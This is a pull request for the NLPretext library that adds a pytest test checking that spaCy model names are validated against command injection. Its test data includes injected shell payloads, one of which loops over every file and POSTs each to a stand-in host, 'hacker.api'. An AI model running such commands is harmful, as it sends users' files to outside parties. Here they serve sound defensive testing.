### PR TITLE
[Test] added test to check regex validation of spacy model name

### DIFF
--- a/tests/test_tokenizer.py
+++ b/tests/test_tokenizer.py
@@ -1,0 +1,19 @@
+import pytest
+from nlpretext.token.tokenizer import LanguageNotInstalledError, _load_spacy_model
+
+
+@pytest.mark.parametrize(
+    "bad_model_name",
+    [
+        ("en_core_web_sm; chmod -x hacker"),
+        (
+            "fr_core_news_sm | for file in $(find .); "
+            'do curl_command -X POST -H "Content-Type: multipart/form-data" '
+            '-F "data=@${file}" https-fake://hacker.api/upload; done'
+        ),
+    ],
+)
+def test_load_spacy_model_validation(bad_model_name):
+    with pytest.raises(LanguageNotInstalledError) as e:
+        _load_spacy_model(bad_model_name)
+        assert bad_model_name in str(e.value)


### PR DESCRIPTION
## Description

I've removed a test on tokenizer.py when changing to Poetry by automatically loading spacy models when they are not available in the environment.
I now add a test on tokenizer.py to check if model names are well validated and that hackers can't execute malicious code with NLPretext !

## Type of Change

- [ ] 📚 Examples / docs / tutorials / dependencies update
- [ ] 🔧 Bug fix (non-breaking change which fixes an issue)
- [ ] 🥂 Improvement (non-breaking change which improves an existing feature)
- [ ] 🚀 New feature (non-breaking change which adds functionality)
- [ ] 💥 Breaking change (fix or feature that would cause existing functionality to change)
- [x] 🔐 Security fix

## Checklist

- [x] I've read the [`CODE_OF_CONDUCT.md`](https://github.com/artefactory/NLPretext}/blob/main/CODE_OF_CONDUCT.md) document.
- [x] I've read the [`CONTRIBUTING.md`](https://github.com/artefactory/NLPretext}/blob/main/CONTRIBUTING.md) guide.
- [x] I've updated the code style using `make codestyle`.
- [x] I've written tests for all new methods and classes that I created.
- [ ] I've written the docstring in Google format for all the methods and classes that I used.
